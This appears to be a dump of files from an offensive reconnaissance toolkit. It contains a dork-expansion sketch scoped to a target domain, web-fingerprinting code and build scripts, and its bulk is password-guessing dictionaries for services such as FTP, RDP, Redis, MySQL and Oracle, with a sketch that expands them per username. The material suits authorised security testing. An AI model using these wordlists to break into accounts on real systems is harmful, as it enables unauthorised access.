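# Sketch: expand %XT% placeholders in dorks.txt into concrete search queries.
def expand_dorks(path, domain, extensions=('php', 'asp', 'aspx', 'jsp', 'html')):
    queries = []
    with open(path, encoding='utf-8') as fh:
        for dork in (line.strip() for line in fh if line.strip()):
            if '%XT%' in dork:
                queries.extend(dork.replace('%XT%', ext) for ext in extensions)
            else:
                queries.append(dork)
    # Scope every query to the target domain.
    return ['site:{} {}'.format(domain, q) for q in queries]

# expand_dorks('wordlists/dorks.txt', 'example.com') ->
#   ['site:example.com login.html', 'site:example.com administrator/login.php', ...]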
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/wordlists/general/common.txt:
--------------------------------------------------------------------------------
1 | admin
2 | test
3 | hello
4 | uk
5 | login
6 | book
7 | robots.txt
8 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/verifyEmails/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/verifyEmails/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/webDetect/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/webDetect/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/webDetect/demo.py:
--------------------------------------------------------------------------------
1 | from Wappalyzer import Wappalyzer, WebPage
2 | wappalyzer = Wappalyzer.latest()
3 | webpage = WebPage.new_from_url('http://www.baidu.com')
4 | wappalyzer.analyze(webpage)
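Note: the demo discards the return value of analyze(). As getWebInfo.py later in this dump shows, it returns a collection of detected technology names, so printing it is the only addition needed to see the fingerprint:

from Wappalyzer import Wappalyzer, WebPage

wappalyzer = Wappalyzer.latest()
webpage = WebPage.new_from_url('http://www.baidu.com')
technologies = wappalyzer.analyze(webpage)  # collection of detected technology names
print(technologies)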
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/webDetect/result.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/webDetect/result.txt
--------------------------------------------------------------------------------
/Plugins/infoGather/webInfo/Wappalyzer/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/webInfo/Wappalyzer/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/webInfo/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/webInfo/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/webInfo/getWebInfo.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.webInfo.Wappalyzer.Wappalyzer import Wappalyzer, WebPage
2 | import warnings
3 | warnings.filterwarnings('ignore')
4 | import requests
5 | from requests.packages.urllib3.exceptions import InsecureRequestWarning
6 | # Disable insecure request warnings
7 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
8 |
9 | wappalyzer = Wappalyzer.latest()
10 |
11 | def run_getWebInfo(url):
12 | try:
13 | webpage = WebPage.new_from_url(url=url, verify=False)
14 | info = wappalyzer.analyze(webpage)
15 | # content = '[{}] : {}'.format(url, info)
16 | if len(info) > 0:
17 | return str(info)
18 | # print('\t[+]{}'.format(content))
19 | except Exception:
20 | pass
21 | return None
22 |
23 | if __name__ == '__main__':
24 | url = r''
25 | info = run_getWebInfo(url)
26 | print(info)
--------------------------------------------------------------------------------
/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/__init__.py
--------------------------------------------------------------------------------
/build.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | apt install python3 -y
3 | apt install python3-pip --fix-missing -y
4 | apt install python3-setuptools -y
5 | apt install tmux -y
6 | python3 -m pip install --upgrade pip
7 | python3 -m pip install openpyxl==2.6.4
8 | python3 -m pip install Cython
9 | python3 -m pip install -r requirements.txt
10 | chmod 777 ./Plugins/infoGather/subdomain/ksubdomain/ksubdomain_linux
11 |
--------------------------------------------------------------------------------
/docker_build.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | apt install python3-setuptools -y
3 | python3 -m pip install -r requirements.txt
4 | chmod 777 ./Plugins/infoGather/subdomain/ksubdomain/ksubdomain_linux
--------------------------------------------------------------------------------
/imgs/0x727.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/0x727.png
--------------------------------------------------------------------------------
/imgs/ObserverWard1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/ObserverWard1.png
--------------------------------------------------------------------------------
/imgs/aiqicha.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/aiqicha.png
--------------------------------------------------------------------------------
/imgs/banner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/banner.png
--------------------------------------------------------------------------------
/imgs/github_auther.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/github_auther.png
--------------------------------------------------------------------------------
/imgs/hostCollide.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/hostCollide.png
--------------------------------------------------------------------------------
/imgs/image-20210728132105833.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728132105833.png
--------------------------------------------------------------------------------
/imgs/image-20210728132752381.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728132752381.png
--------------------------------------------------------------------------------
/imgs/image-20210728133047590.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728133047590.png
--------------------------------------------------------------------------------
/imgs/image-20210728134051049.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728134051049.png
--------------------------------------------------------------------------------
/imgs/image-20210728134115608.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728134115608.png
--------------------------------------------------------------------------------
/imgs/image-20210728134131076.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728134131076.png
--------------------------------------------------------------------------------
/imgs/image-20210728134212279.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728134212279.png
--------------------------------------------------------------------------------
/imgs/image-20210728134304533.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728134304533.png
--------------------------------------------------------------------------------
/imgs/image-20210728153419131.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728153419131.png
--------------------------------------------------------------------------------
/imgs/image-20210728154929084.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728154929084.png
--------------------------------------------------------------------------------
/imgs/image-20210728155358378.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728155358378.png
--------------------------------------------------------------------------------
/imgs/image-20210728155541501-7458943.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728155541501-7458943.png
--------------------------------------------------------------------------------
/imgs/image-20210728155541501.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728155541501.png
--------------------------------------------------------------------------------
/imgs/image-20210728160705706.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728160705706.png
--------------------------------------------------------------------------------
/imgs/image-20210728161022348.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728161022348.png
--------------------------------------------------------------------------------
/imgs/image-20210728161117459.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728161117459.png
--------------------------------------------------------------------------------
/imgs/image-20210728161339208.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728161339208.png
--------------------------------------------------------------------------------
/imgs/image-20210728161507035.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728161507035.png
--------------------------------------------------------------------------------
/imgs/image-20210728161711534.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728161711534.png
--------------------------------------------------------------------------------
/imgs/image-20210728162049962.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728162049962.png
--------------------------------------------------------------------------------
/imgs/image-20210728162119531.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728162119531.png
--------------------------------------------------------------------------------
/imgs/image-20210728162303312.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728162303312.png
--------------------------------------------------------------------------------
/imgs/image-20210728162441132.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728162441132.png
--------------------------------------------------------------------------------
/imgs/image-20210728162655684.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728162655684.png
--------------------------------------------------------------------------------
/imgs/image-20210728163216047.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728163216047.png
--------------------------------------------------------------------------------
/imgs/image-20210728163926763.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728163926763.png
--------------------------------------------------------------------------------
/imgs/image-20210728163940918.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728163940918.png
--------------------------------------------------------------------------------
/imgs/image-20210728164010063.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728164010063.png
--------------------------------------------------------------------------------
/imgs/image-20210728164040649.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728164040649.png
--------------------------------------------------------------------------------
/imgs/image-20210728164146630.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728164146630.png
--------------------------------------------------------------------------------
/imgs/image-20210728164211552.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728164211552.png
--------------------------------------------------------------------------------
/imgs/image-20210728164316747.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728164316747.png
--------------------------------------------------------------------------------
/imgs/image-20210728164555141.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728164555141.png
--------------------------------------------------------------------------------
/imgs/image-20210728164745820.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728164745820.png
--------------------------------------------------------------------------------
/imgs/image-20210728164811422.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728164811422.png
--------------------------------------------------------------------------------
/imgs/image-20210728164933353.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728164933353.png
--------------------------------------------------------------------------------
/imgs/image-20210728165004202.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728165004202.png
--------------------------------------------------------------------------------
/imgs/image-20210728165052361.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728165052361.png
--------------------------------------------------------------------------------
/imgs/image-20210728165612314.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728165612314.png
--------------------------------------------------------------------------------
/imgs/image-20210728170303756.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728170303756.png
--------------------------------------------------------------------------------
/imgs/image-20210728193058487.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/image-20210728193058487.png
--------------------------------------------------------------------------------
/imgs/kuaidaili1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/kuaidaili1.png
--------------------------------------------------------------------------------
/imgs/kuaidaili2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/kuaidaili2.png
--------------------------------------------------------------------------------
/imgs/kuaidaili3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/kuaidaili3.png
--------------------------------------------------------------------------------
/imgs/kuaidaili4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/kuaidaili4.png
--------------------------------------------------------------------------------
/imgs/nuclei_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/nuclei_1.png
--------------------------------------------------------------------------------
/imgs/qianxinApi.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/qianxinApi.png
--------------------------------------------------------------------------------
/imgs/qianxinApi2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/qianxinApi2.png
--------------------------------------------------------------------------------
/imgs/quakeApi.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/quakeApi.png
--------------------------------------------------------------------------------
/imgs/quakeApi2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/quakeApi2.png
--------------------------------------------------------------------------------
/imgs/securitytrails.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/securitytrails.png
--------------------------------------------------------------------------------
/imgs/socksProxy.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/socksProxy.png
--------------------------------------------------------------------------------
/imgs/xmind.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/imgs/xmind.png
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_ftp.txt:
--------------------------------------------------------------------------------
1 | %user%
2 | %user%123
3 | %user%1234
4 | %user%123456
5 | %user%12345
6 | %user%@123
7 | %user%@123456
8 | %user%@12345
9 | %user%#123
10 | %user%#123456
11 | %user%#12345
12 | %user%_123
13 | %user%_123456
14 | %user%_12345
15 | %user%123!@#
16 | %user%!@#$
17 | %user%!@#
18 | %user%~!@
19 | %user%!@#123
20 | qweasdzxc
21 | %user%2017
22 | %user%2016
23 | %user%2015
24 | %user%@2017
25 | %user%@2016
26 | %user%@2015
27 | Passw0rd
28 | admin123
29 | admin888
30 | administrator
31 | administrator123
32 | ftp
33 | ftppass
34 | 123456
35 | password
36 | 12345
37 | 1234
38 | root
39 | 123
40 | qwerty
41 | test
42 | 1q2w3e4r
43 | 1qaz2wsx
44 | qazwsx
45 | 123qwe
46 | 123qaz
47 | 0000
48 | oracle
49 | 1234567
50 | 123456qwerty
51 | password123
52 | 12345678
53 | 1q2w3e
54 | abc123
55 | okmnji
56 | test123
57 | 123456789
58 | q1w2e3r4
59 | user
60 | mysql
61 | web
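Note: %user% acts as a username placeholder in this and all the other PwdTxt dictionaries. A minimal sketch of how such a list might be expanded for a given account (the helper below is an illustrative assumption, not code from this project):

# Sketch: substitute %user% with the account name being tested.
def load_passwords(path, username):
    candidates = []
    with open(path, encoding='utf-8') as fh:
        for line in fh:
            word = line.strip()
            if word:
                candidates.append(word.replace('%user%', username))
    return candidates

# load_passwords('iniFile/PwdTxt/dic_password_ftp.txt', 'ftpadmin')
#   -> ['ftpadmin', 'ftpadmin123', ..., 'Passw0rd', 'admin123', ...]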
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_imap.txt:
--------------------------------------------------------------------------------
1 | %user%
2 | %user%123
3 | %user%1234
4 | %user%123456
5 | %user%12345
6 | %user%@123
7 | %user%@123456
8 | %user%@12345
9 | %user%#123
10 | %user%#123456
11 | %user%#12345
12 | %user%_123
13 | %user%_123456
14 | %user%_12345
15 | %user%123!@#
16 | %user%!@#$
17 | %user%!@#
18 | %user%~!@
19 | %user%!@#123
20 | qweasdzxc
21 | %user%2017
22 | %user%2016
23 | %user%2015
24 | %user%@2017
25 | %user%@2016
26 | %user%@2015
27 | 123456
28 | Passw0rd
29 | password
30 | 12345
31 | 1234
32 | root
33 | 123
34 | qwerty
35 | test123
36 | 1q2w3e4r
37 | 1qaz2wsx
38 | qazwsx
39 | 123qwe
40 | 123qaz
41 | 0000
42 | 000000
43 | 88888888
44 | 666666
45 | 111111
46 | oracle
47 | 1234567
48 | 123456qwerty
49 | 12345678
50 | 1q2w3e
51 | abc123
52 | 123456789
53 | q1w2e3r4
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_imap_ssl.txt:
--------------------------------------------------------------------------------
1 | %user%
2 | %user%123
3 | %user%1234
4 | %user%123456
5 | %user%12345
6 | %user%@123
7 | %user%@123456
8 | %user%@12345
9 | %user%#123
10 | %user%#123456
11 | %user%#12345
12 | %user%_123
13 | %user%_123456
14 | %user%_12345
15 | %user%123!@#
16 | %user%!@#$
17 | %user%!@#
18 | %user%~!@
19 | %user%!@#123
20 | qweasdzxc
21 | %user%2017
22 | %user%2016
23 | %user%2015
24 | %user%@2017
25 | %user%@2016
26 | %user%@2015
27 | 123456
28 | Passw0rd
29 | password
30 | 12345
31 | 1234
32 | root
33 | 123
34 | qwerty
35 | test123
36 | 1q2w3e4r
37 | 1qaz2wsx
38 | qazwsx
39 | 123qwe
40 | 123qaz
41 | 0000
42 | 000000
43 | 88888888
44 | 666666
45 | 111111
46 | oracle
47 | 1234567
48 | 123456qwerty
49 | 12345678
50 | 1q2w3e
51 | abc123
52 | 123456789
53 | q1w2e3r4
54 |
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_memcached.txt:
--------------------------------------------------------------------------------
1 | Passw0rd
2 | admin
3 | %user%
4 | %user%123
5 | %user%1234
6 | %user%123456
7 | %user%12345
8 | %user%@123
9 | %user%@123456
10 | %user%@12345
11 | %user%#123
12 | %user%#123456
13 | %user%#12345
14 | %user%_123
15 | %user%_123456
16 | %user%_12345
17 | %user%123!@#
18 | 空
19 | %user%!@#$
20 | %user%!@#
21 | %user%~!@
22 | %user%!@#123
23 | qweasdzxc
24 | %user%2017
25 | %user%2016
26 | %user%2015
27 | %user%@2017
28 | %user%@2016
29 | %user%@2015
30 | admin123
31 | admin888
32 | administrator
33 | administrator123
34 | root123
35 | 123456
36 | password
37 | 12345
38 | 1234
39 | root
40 | 123
41 | qwerty
42 | test
43 | 1q2w3e4r
44 | 1qaz2wsx
45 | qazwsx
46 | 123qwe
47 | 123qaz
48 | 0000
49 | oracle
50 | 1234567
51 | 123456qwerty
52 | password123
53 | 12345678
54 | 1q2w3e
55 | abc123
56 | okmnji
57 | test123
58 | 123456789
59 | q1w2e3r4
60 | user
61 | web
62 |
63 |
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_mongodb.txt:
--------------------------------------------------------------------------------
1 | 空
2 | admin
3 | mongodb
4 | %user%
5 | %user%123
6 | %user%1234
7 | %user%123456
8 | %user%12345
9 | %user%@123
10 | %user%@123456
11 | %user%@12345
12 | %user%#123
13 | %user%#123456
14 | %user%#12345
15 | %user%_123
16 | %user%_123456
17 | %user%_12345
18 | %user%123!@#
19 | %user%!@#$
20 | %user%!@#
21 | 空
22 | %user%~!@
23 | %user%!@#123
24 | Passw0rd
25 | qweasdzxc
26 | %user%2017
27 | %user%2016
28 | %user%2015
29 | %user%@2017
30 | %user%@2016
31 | %user%@2015
32 | admin123
33 | admin888
34 | administrator
35 | administrator123
36 | mongodb123
37 | mongodbpass
38 | 123456
39 | password
40 | 12345
41 | 1234
42 | root
43 | 123
44 | qwerty
45 | test
46 | 1q2w3e4r
47 | 1qaz2wsx
48 | qazwsx
49 | 123qwe
50 | 123qaz
51 | 0000
52 | oracle
53 | 1234567
54 | 123456qwerty
55 | password123
56 | 12345678
57 | 1q2w3e
58 | abc123
59 | okmnji
60 | test123
61 | 123456789
62 | q1w2e3r4
63 | user
64 | web
65 |
66 |
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_mysql.txt:
--------------------------------------------------------------------------------
1 | root
2 | 123456
3 | rootroot
4 | root123
5 | 1qaz@WSX
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_oracle.txt:
--------------------------------------------------------------------------------
1 | %user%
2 | %user%123
3 | %user%1234
4 | %user%123456
5 | %user%12345
6 | %user%@123
7 | %user%@123456
8 | %user%@12345
9 | %user%#123
10 | %user%#123456
11 | %user%#12345
12 | %user%_123
13 | %user%_123456
14 | %user%_12345
15 | %user%123!@#
16 | %user%!@#$
17 | %user%!@#
18 | %user%~!@
19 | %user%!@#123
20 | qweasdzxc
21 | %user%2017
22 | %user%2016
23 | %user%2015
24 | %user%@2017
25 | %user%@2016
26 | %user%@2015
27 | Passw0rd
28 | admin
29 | sys
30 | system
31 | oracle
32 | dbadmin
33 | qweasdzxc
34 | admin123
35 | admin888
36 | administrator
37 | administrator123
38 | root123
39 | 123456
40 | password
41 | 12345
42 | root
43 | qwerty
44 | test
45 | 1q2w3e4r
46 | 1qaz2wsx
47 | qazwsx
48 | 123qwe
49 | 123qaz
50 | oracle
51 | 1234567
52 | 123456qwerty
53 | password123
54 | 12345678
55 | 1q2w3e
56 | abc123
57 | okmnji
58 | test123
59 | 123456789
60 | q1w2e3r4
61 | oracle
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_pop3.txt:
--------------------------------------------------------------------------------
1 | %user%
2 | %user%123
3 | %user%1234
4 | %user%123456
5 | %user%12345
6 | %user%@123
7 | %user%@123456
8 | %user%@12345
9 | %user%#123
10 | %user%#123456
11 | %user%#12345
12 | %user%_123
13 | %user%_123456
14 | %user%_12345
15 | %user%123!@#
16 | %user%!@#$
17 | %user%!@#
18 | %user%~!@
19 | %user%!@#123
20 | qweasdzxc
21 | %user%2017
22 | %user%2016
23 | %user%2015
24 | %user%@2017
25 | %user%@2016
26 | %user%@2015
27 | Passw0rd
28 | 123456
29 | password
30 | 12345
31 | 1234
32 | root
33 | 123
34 | qwerty
35 | test123
36 | 1q2w3e4r
37 | 1qaz2wsx
38 | qazwsx
39 | 123qwe
40 | 123qaz
41 | 0000
42 | 000000
43 | 88888888
44 | 666666
45 | 111111
46 | oracle
47 | 1234567
48 | 123456qwerty
49 | 12345678
50 | 1q2w3e
51 | abc123
52 | 123456789
53 | q1w2e3r4
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_postgresql.txt:
--------------------------------------------------------------------------------
1 | admin
2 | Passw0rd
3 | postgres
4 | %user%
5 | %user%123
6 | %user%1234
7 | %user%123456
8 | %user%12345
9 | %user%@123
10 | %user%@123456
11 | %user%@12345
12 | %user%#123
13 | %user%#123456
14 | %user%#12345
15 | %user%_123
16 | %user%_123456
17 | %user%_12345
18 | %user%123!@#
19 | %user%!@#$
20 | %user%!@#
21 | %user%~!@
22 | %user%!@#123
23 | qweasdzxc
24 | %user%2017
25 | %user%2016
26 | %user%2015
27 | %user%@2017
28 | %user%@2016
29 | %user%@2015
30 | admin123
31 | admin888
32 | administrator
33 | administrator123
34 | root123
35 | ftp
36 | ftppass
37 | 123456
38 | password
39 | 12345
40 | 1234
41 | root
42 | 123
43 | qwerty
44 | test
45 | 1q2w3e4r
46 | 1qaz2wsx
47 | qazwsx
48 | 123qwe
49 | 123qaz
50 | 0000
51 | oracle
52 | 1234567
53 | 123456qwerty
54 | password123
55 | 12345678
56 | 1q2w3e
57 | abc123
58 | okmnji
59 | test123
60 | 123456789
61 | q1w2e3r4
62 | user
63 | web
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_rdp.txt:
--------------------------------------------------------------------------------
1 | %user%
2 | %user%123
3 | %user%1234
4 | %user%123456
5 | %user%12345
6 | %user%@123
7 | %user%@123456
8 | %user%@12345
9 | %user%#123
10 | %user%#123456
11 | %user%#12345
12 | %user%_123
13 | %user%_123456
14 | %user%_12345
15 | %user%123!@#
16 | %user%!@#$
17 | %user%!@#
18 | %user%~!@
19 | %user%!@#123
20 | qweasdzxc
21 | %user%2017
22 | %user%2016
23 | %user%2015
24 | %user%@2017
25 | %user%@2016
26 | %user%@2015
27 | Passw0rd
28 | admin123!@#
29 | admin
30 | admin123
31 | admin@123
32 | admin#123
33 | 123456
34 | password
35 | 12345
36 | 1234
37 | root
38 | 123
39 | qwerty
40 | test
41 | 1q2w3e4r
42 | 1qaz2wsx
43 | qazwsx
44 | 123qwe
45 | 123qaz
46 | 0000
47 | oracle
48 | 1234567
49 | 123456qwerty
50 | password123
51 | 12345678
52 | 1q2w3e
53 | abc123
54 | okmnji
55 | test123
56 | 123456789
57 | postgres
58 | q1w2e3r4
59 | redhat
60 | user
61 | mysql
62 | apache
63 |
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_redis.txt:
--------------------------------------------------------------------------------
1 | Passw0rd
2 | admin
3 | %user%
4 | %user%123
5 | %user%1234
6 | %user%123456
7 | %user%12345
8 | %user%@123
9 | %user%@123456
10 | %user%@12345
11 | %user%#123
12 | %user%#123456
13 | %user%#12345
14 | %user%_123
15 | %user%_123456
16 | %user%_12345
17 | %user%123!@#
18 | %user%!@#$
